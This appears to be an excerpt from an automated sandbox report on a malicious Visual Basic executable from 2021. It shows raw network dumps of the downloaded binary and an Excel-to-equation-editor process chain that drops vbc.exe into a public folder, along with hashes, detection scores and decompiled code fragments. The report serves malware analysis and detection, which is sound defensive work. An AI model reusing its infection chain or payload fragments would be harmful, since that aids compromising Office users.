                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u1110~00Rich1PELxP @ D(( .text `.data@.rsrc@@IMSVBVM60.DLL
                                                    Mar 31, 2021 12:05:18.380701065 CEST8INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Mar 31, 2021 12:05:18.380733967 CEST10INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Mar 31, 2021 12:05:18.380764008 CEST11INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Mar 31, 2021 12:05:18.610848904 CEST12INData Raw: 2d 00 ff 03 1b 00 00 00 04 05 00 46 69 6c 65 31 00 12 04 f0 0f d8 09 bf 04 e0 01 0b 05 00 ff 03 1a 00 00 00 05 04 00 44 69 72 31 00 11 04 f8 16 a8 0c bf 04 3b 01 0b 04 00 ff 03 1a 00 00 00 06 06 00 54 69 6d 65 72 31 00 0b 07 f8 16 00 00 08 a8 0c
                                                    Data Ascii: -File1Dir1;Timer1Drive1;VScroll17HScroll1 7List1&Label1Label1
                                                    Mar 31, 2021 12:05:18.610904932 CEST14INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: 0,YoN!>tMQ;BH%a.b4osd~Dx|!R
                                                    Mar 31, 2021 12:05:18.610935926 CEST15INData Raw: 00 00 dd 1b f6 27 01 d9 1f a0 b2 e9 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 27 33 d0 94 03 12 75 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00
                                                    Data Ascii: ''3u&13`a
                                                    Mar 31, 2021 12:05:18.610974073 CEST17INData Raw: ae 18 fb ef 24 88 a7 c0 5c d9 1f 12 75 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 59 e4 e4 e3 b4 18 56 39 31 1e 9d 59 d9 96 7c c1 d9 1f f9 b2 ed 00 00 9e 00
                                                    Data Ascii: $\uYV91Y|y|23RRyc0n
                                                    Mar 31, 2021 12:05:18.611010075 CEST18INData Raw: 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 7f 9f e6 64 c7 9f d8 26 a2 21 56 5c c2 a7 59 d9 7e c8 af b9 ac 5a d9 22 bc f6 dc 70 28 f9 59 b8 94 84 79 e1 d5 78 9e d9 1f f8 59 32 33 00 00 9e 00 00
                                                    Data Ascii: d&!V\Y~Z"p(YyxY23}IYZV\Yy2yY,s*zY23&*9.AXV{~pYOx&YLx
                                                    Mar 31, 2021 12:05:18.611041069 CEST19INData Raw: 92 67 1e f9 59 d9 9b 1f da 27 1e 8c 00 e4 72 e4 de e9 10 7d 8c a2 1f f9 b2 ed 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 27 14 64 11
                                                    Data Ascii: gY'r}'dk"fV]Y"rdY23x?2f`}ddkx\"!MV]8YY&r:u
                                                    Mar 31, 2021 12:05:18.611073971 CEST21INData Raw: 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 00 9e 00 7d af 26 aa e9 58 d9 1f 11 48 dc 1f f9 31 e0 1a f9 59 e0 dd 06 ec d9 1e f9 59 52 62 d9 d8 1e 1f f9 58 d9 48 72 24 f9 f4 cd 00 9e 00 00 9e 00 00 9e
                                                    Data Ascii: }&XH1YYRbXHr$>Y&9)Y]r$>Y[Y.0VZY',+Nm


                                                    HTTPS Packets

                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                    Mar 31, 2021 12:05:17.325469971 CEST172.67.83.132443192.168.2.2249165CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jul 09 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Jul 09 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:12:04:51
                                                    Start date:31/03/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase:0x13f330000
                                                    File size:27641504 bytes
                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:12:05:13
                                                    Start date:31/03/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:12:05:16
                                                    Start date:31/03/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                    Imagebase:0x400000
                                                    File size:73728 bytes
                                                    MD5 hash:6CC6D1DD6CDD848693426A270563C921
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Visual Basic
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 6%, ReversingLabs
                                                    Reputation:low

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Executed Functions

                                                      C-Code - Quality: 90%
                                                      			_entry_() {
                                                      				signed char _t1;
                                                      				intOrPtr* _t2;
                                                      				intOrPtr* _t3;
                                                      				void* _t4;
                                                      
                                                      				_push("VB5!6&*"); // executed
                                                      				L00401202(); // executed
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				 *_t1 =  *_t1 ^ _t1;
                                                      				 *_t1 =  *_t1 + _t1;
                                                      				_t2 = _t1 + 1;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t2 =  *_t2 + _t2;
                                                      				 *_t3 =  *_t3 + _t4;
                                                      				goto [far dword [ecx-0x10985840];
                                                      			}







                                                      0x00401208
                                                      0x0040120d
                                                      0x00401212
                                                      0x00401214
                                                      0x00401216
                                                      0x00401218
                                                      0x0040121a
                                                      0x0040121c
                                                      0x0040121d
                                                      0x0040121f
                                                      0x00401221
                                                      0x00401223
                                                      0x00401225

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: #100
                                                      • String ID: VB5!6&*
                                                      • API String ID: 1341478452-3593831657
                                                      • Opcode ID: 45c12bacf53e23c7ed6bec20edfd3f0513c2318b4eb52b60129983870de667a6
                                                      • Instruction ID: dcbedad8c1e65dc390ef5c37b92ef5270d5aa83402cf73b69b9b63ffaab646bb
                                                      • Opcode Fuzzy Hash: 45c12bacf53e23c7ed6bec20edfd3f0513c2318b4eb52b60129983870de667a6
                                                      • Instruction Fuzzy Hash: 31D0A44184E3D08FCB032BBA48665423FB06D2365835B0AEBC090EE0EBC06D484DC327
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e5fe9549a2646df5139bd18fd3d11bfc6b846f64e944f395b0ace704fb270af
                                                      • Instruction ID: 2a8fda4ac8c7da83d07f6cc6ace690ebbe1fb05441e72cafa0e968c23ec774df
                                                      • Opcode Fuzzy Hash: 9e5fe9549a2646df5139bd18fd3d11bfc6b846f64e944f395b0ace704fb270af
                                                      • Instruction Fuzzy Hash: 9BD13772704702AFD7169F28ED81BE6B3A8FF14310F25422BF8A997741C734AC958B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e74b8716cc24b9744d57ac94c58761d6d3724d48b7b788ed1b5567699671377
                                                      • Instruction ID: a6e5a101b40fb358099819f752d9f1f6fa2a5cdf84d98c003e64d5c0e1e6fdd4
                                                      • Opcode Fuzzy Hash: 4e74b8716cc24b9744d57ac94c58761d6d3724d48b7b788ed1b5567699671377
                                                      • Instruction Fuzzy Hash: 02316677600202EFCB269A18EC41BEAB3A8BF44350F25412BF899D7750CB20ED458752
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da157eb21c9c63b1ba427994995d29672b6466aafa3d7ccd665c34a0f5e02f15
                                                      • Instruction ID: 6f251c0c8b23f9c68611c1a8fdf7fec2c0958af87141f6f488123900d15f4fc8
                                                      • Opcode Fuzzy Hash: da157eb21c9c63b1ba427994995d29672b6466aafa3d7ccd665c34a0f5e02f15
                                                      • Instruction Fuzzy Hash: 7831E072248340EFEB22AB24E949BA973A5BF00340F654047F8469B6D2C7B5DA80DB12
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8e01b18386e126f88bbfd6070d4edf9c6d277c65b674a5f2e3f9ca40a01b752
                                                      • Instruction ID: f08ecb48e1c3389e2b3c0c690ffcc8d3742b7b521af87062fb2981a591374a0d
                                                      • Opcode Fuzzy Hash: e8e01b18386e126f88bbfd6070d4edf9c6d277c65b674a5f2e3f9ca40a01b752
                                                      • Instruction Fuzzy Hash: 9E210776644381EFEB236B20A84AFE43765AF00740F618047F9055F6D2D776D984D713
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b34004de46934d2820505943e1c38402d99112f667fef37400cfa3d5fcfe4d60
                                                      • Instruction ID: 05bbaaa320213bdc98176de6ed3820c6924442933b1453d8fc51051f27ddba90
                                                      • Opcode Fuzzy Hash: b34004de46934d2820505943e1c38402d99112f667fef37400cfa3d5fcfe4d60
                                                      • Instruction Fuzzy Hash: BA210576644341AFEB266B20BD4AFD43765AF00710F658047F9055F6D2C3769984EA13
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 196d5a77d3c61d1781ca327e037687fec6b5d49d06a43ab28c7f72fd53924c07
                                                      • Instruction ID: af581ee9b721d25ab55fbe3a56dd7acd4ebbcbee115ceee95959a67cfddb04ed
                                                      • Opcode Fuzzy Hash: 196d5a77d3c61d1781ca327e037687fec6b5d49d06a43ab28c7f72fd53924c07
                                                      • Instruction Fuzzy Hash: 14F0F6A3949A54BBDF232B24FB83BA9336DCF14361F2081A3F432CA743D614D8845545
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 650b63793c467b66e3a59cf74f0340b6c895a25d5d339a3f09ccf492eb44c700
                                                      • Instruction ID: f575497eb87e7a5271149cbe2f8967ec2e9d15d8e5456965d2c346c2a0df7806
                                                      • Opcode Fuzzy Hash: 650b63793c467b66e3a59cf74f0340b6c895a25d5d339a3f09ccf492eb44c700
                                                      • Instruction Fuzzy Hash: F7F01D7732D140CFD71BDA14E690B7673AE6F44740F758457A8428BB62E224EC41D651
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                      • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                                                      • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                                                      • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040E754(void* __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, void* _a20) {
                                                      				void* _v3;
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				void* _v40;
                                                      				void* _v52;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				void* _v72;
                                                      				void* _v80;
                                                      				void* _v88;
                                                      				void* _v96;
                                                      				void* _v104;
                                                      				void* _v112;
                                                      				void* _v116;
                                                      				void* _v120;
                                                      				void* _v128;
                                                      				void* _v132;
                                                      				void* _v136;
                                                      				void* _v140;
                                                      				void* _v144;
                                                      				void* _v148;
                                                      				void* _v152;
                                                      				void* _v168;
                                                      				void* _v184;
                                                      				void* _v196;
                                                      				void* _v200;
                                                      				void* _v204;
                                                      				void* _v208;
                                                      				void* _v212;
                                                      				void* _v216;
                                                      				void* _v220;
                                                      				void* _v224;
                                                      				void* _v228;
                                                      				void* _v232;
                                                      				void* _v236;
                                                      				void* _v240;
                                                      				void* _v244;
                                                      				void* _v248;
                                                      				void* _v252;
                                                      				void* _v256;
                                                      				void* _v260;
                                                      				void* _t280;
                                                      				void* _t281;
                                                      				void* _t284;
                                                      				intOrPtr _t285;
                                                      
                                                      				_t280 = __esi;
                                                      				_t285 = _t284 - 0xc;
                                                      				asm("in al, dx");
                                                      				asm("adc [eax], eax");
                                                      				 *[fs:0x0] = _t285;
                                                      				L00401100();
                                                      				_v16 = _t285;
                                                      				asm("hlt");
                                                      				_v12 = 0x4010d0;
                                                      				_v8 = _a4 & 0x00000001;
                                                      				_a4 = _a4 & 0x000000fe;
                                                      				 *(__ebx + 0x8b0845) =  *(__ebx + 0x8b0845) | __ecx;
                                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], es, _t281);
                                                      				asm("ror byte [edi], 0x84");
                                                      				asm("loop 0x3");
                                                      				 *0x00000000 =  *0x00000000;
                                                      			}


















































                                                      0x0040e754
                                                      0x0040e757
                                                      0x0040e758
                                                      0x0040e75c
                                                      0x0040e766
                                                      0x0040e772
                                                      0x0040e77a
                                                      0x0040e77b
                                                      0x0040e77d
                                                      0x0040e78a
                                                      0x0040e792
                                                      0x0040e794
                                                      0x0040e79d
                                                      0x0040e7a3
                                                      0x0040e7a6
                                                      0x0040e7a8

                                                      APIs
                                                      • __vbaChkstk.MSVBVM60(?,00401106), ref: 0040E772
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,?,00401106), ref: 0040E7BD
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E7F6
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCC0,00000060), ref: 0040E82E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[), ref: 0040E855
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E88E
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8D8
                                                      • __vbaFpI4.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8F2
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002C8,?,?,?,?,00000000), ref: 0040E966
                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00000000), ref: 0040E984
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002B4), ref: 0040E9B5
                                                      • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 0040EA0E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,00000002,00000003,00000002), ref: 0040EA31
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA6A
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DCE0,00000100), ref: 0040EAA8
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAD4,000006F8,?,?,002E0077,?,?), ref: 0040EB09
                                                      • __vbaFreeStr.MSVBVM60(?,?,002E0077,?,?), ref: 0040EB26
                                                      • __vbaFreeObj.MSVBVM60(?,?,002E0077,?,?), ref: 0040EB2E
                                                      • #589.MSVBVM60(00000001,?,?,002E0077,?,?), ref: 0040EB35
                                                      • __vbaNew2.MSVBVM60(0040DD10,004102D4,00000001,?,?,002E0077,?,?), ref: 0040EB58
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DD00,0000001C,?,?,002E0077,?,?), ref: 0040EBBA
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,002E0077,?,?), ref: 0040EBF8
                                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,002E0077,?,?), ref: 0040EC31
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DCC0,00000118,?,?,002E0077,?,?), ref: 0040EC6F
                                                      • __vbaChkstk.MSVBVM60(?,?,002E0077,?,?), ref: 0040EC86
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DD20,00000060,?,?,002E0077,?,?), ref: 0040ECCC
                                                      • __vbaFreeStr.MSVBVM60(?,?,002E0077,?,?), ref: 0040ECE3
                                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,002E0077,?,?), ref: 0040ECF2
                                                      • __vbaVarForNext.MSVBVM60(?,?,?,00000001,?,?,002E0077,?,?), ref: 0040ED0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: __vba$CheckHresult$FreeNew2$ChkstkList$#589InitNext
                                                      • String ID: ~[$w
                                                      • API String ID: 14863815-3546532830
                                                      • Opcode ID: 2b9739e0a9a3bd7738b9463e5c8f4791561accacc990cb24169e416baa431781
                                                      • Instruction ID: 25f52c12f5864980af4dab9b5b01976af5df806854c308f781eceefb825ae437
                                                      • Opcode Fuzzy Hash: 2b9739e0a9a3bd7738b9463e5c8f4791561accacc990cb24169e416baa431781
                                                      • Instruction Fuzzy Hash: B5020571900218EFDB20DF91CC49BDDBBB5BB08304F1084AAF149BB2A1DBB95A95DF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E00404953(void* __eax, void* __ebx, signed int __ecx, void* __edi, void* __esi) {
                                                      				void* _t280;
                                                      				void* _t281;
                                                      				void* _t282;
                                                      				intOrPtr _t283;
                                                      
                                                      				_t280 = __esi;
                                                      				asm("in al, dx");
                                                      				asm("adc [eax], eax");
                                                      				 *[fs:0x0] = _t283;
                                                      				L00401100();
                                                      				 *((intOrPtr*)(_t281 - 0xc)) = _t283;
                                                      				asm("hlt");
                                                      				 *((intOrPtr*)(_t281 - 8)) = 0x4010d0;
                                                      				 *(_t281 - 4) =  *(_t281 + 8) & 0x00000001;
                                                      				 *(_t281 + 8) =  *(_t281 + 8) & 0x000000fe;
                                                      				_t282 = _t281 + 1;
                                                      				 *(__ebx + 0x8b0845) =  *(__ebx + 0x8b0845) | __ecx;
                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)))) + 4))( *((intOrPtr*)(_t282 + 8)), __edi, __esi, __ebx,  *[fs:0x0], es);
                                                      				asm("ror byte [edi], 0x84");
                                                      				asm("loop 0x3");
                                                      				 *0x00000000 =  *0x00000000;
                                                      			}







                                                      0x00404953
                                                      0x0040e758
                                                      0x0040e75c
                                                      0x0040e766
                                                      0x0040e772
                                                      0x0040e77a
                                                      0x0040e77b
                                                      0x0040e77d
                                                      0x0040e78a
                                                      0x0040e792
                                                      0x0040e793
                                                      0x0040e794
                                                      0x0040e79d
                                                      0x0040e7a3
                                                      0x0040e7a6
                                                      0x0040e7a8

                                                      APIs
                                                      • __vbaChkstk.MSVBVM60(?,00401106), ref: 0040E772
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[,?,?,?,?,00401106), ref: 0040E7BD
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E7F6
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCC0,00000060), ref: 0040E82E
                                                      • __vbaNew2.MSVBVM60(0040DE20, ~[), ref: 0040E855
                                                      • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E88E
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8D8
                                                      • __vbaFpI4.MSVBVM60(00000000,?,0040DCD0,000001C0), ref: 0040E8F2
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002C8,?,?,?,?,00000000), ref: 0040E966
                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,0040DAA4,000002B4), ref: 0040E9B5
                                                      • __vbaVarForInit.MSVBVM60(?,?,?,00000002,00000003,00000002), ref: 0040EA0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379278850.0000000000411000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: __vba$CheckHresult$New2$ChkstkInit
                                                      • String ID: ~[
                                                      • API String ID: 4284077100-2315863030
                                                      • Opcode ID: 128f934bf874ffb7bef7f19fc4aaf8a2dcf12e10e4be32ef0accf9077fa46989
                                                      • Instruction ID: 5fdc7e078cc36474cb74101d3461b7f37e5fca3877a5a169f4a8d6c534bece78
                                                      • Opcode Fuzzy Hash: 128f934bf874ffb7bef7f19fc4aaf8a2dcf12e10e4be32ef0accf9077fa46989
                                                      • Instruction Fuzzy Hash: F0810571900218EFDB10DF95CC49F9DBBB8BB08304F1085AAF549BB2A0CB799A94DF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0040ED95(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4, void* _a20) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				long long* _v16;
                                                      				char _v28;
                                                      				void* _t14;
                                                      				char* _t16;
                                                      				void* _t21;
                                                      				void* _t23;
                                                      				long long* _t24;
                                                      
                                                      				_t24 = _t23 - 0xc;
                                                      				 *[fs:0x0] = _t24;
                                                      				L00401100();
                                                      				_v16 = _t24;
                                                      				_v12 = 0x4010e8;
                                                      				_v8 = 0;
                                                      				_t14 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401106, _t21);
                                                      				_t16 =  &_v28;
                                                      				L004011A2();
                                                      				asm("fldz");
                                                      				_push(_t16);
                                                      				_push(_t16);
                                                      				 *_t24 = __fp0;
                                                      				L00401196();
                                                      				L0040119C();
                                                      				asm("fcomp qword [0x4010e0]");
                                                      				asm("fnstsw ax");
                                                      				asm("sahf");
                                                      				if(__eflags != 0) {
                                                      					L00401190();
                                                      				}
                                                      				asm("wait");
                                                      				_push(E0040EE10);
                                                      				L004011C6();
                                                      				return _t14;
                                                      			}












                                                      0x0040ed98
                                                      0x0040eda7
                                                      0x0040edb1
                                                      0x0040edb9
                                                      0x0040edbc
                                                      0x0040edc3
                                                      0x0040edd2
                                                      0x0040edd8
                                                      0x0040eddb
                                                      0x0040ede0
                                                      0x0040ede2
                                                      0x0040ede3
                                                      0x0040ede4
                                                      0x0040ede7
                                                      0x0040edec
                                                      0x0040edf1
                                                      0x0040edf7
                                                      0x0040edf9
                                                      0x0040edfa
                                                      0x0040edfc
                                                      0x0040edfc
                                                      0x0040ee01
                                                      0x0040ee02
                                                      0x0040ee0a
                                                      0x0040ee0f

                                                      APIs
                                                      • __vbaChkstk.MSVBVM60(?,00401106), ref: 0040EDB1
                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401106), ref: 0040EDDB
                                                      • #584.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDE7
                                                      • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDEC
                                                      • __vbaEnd.MSVBVM60(?,?,?,?,?,?,00401106), ref: 0040EDFC
                                                      • __vbaFreeStr.MSVBVM60(0040EE10,?,?,?,?,?,?,00401106), ref: 0040EE0A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2379265180.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2379260716.0000000000400000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2379274369.0000000000410000.00000004.00020000.sdmp Download File
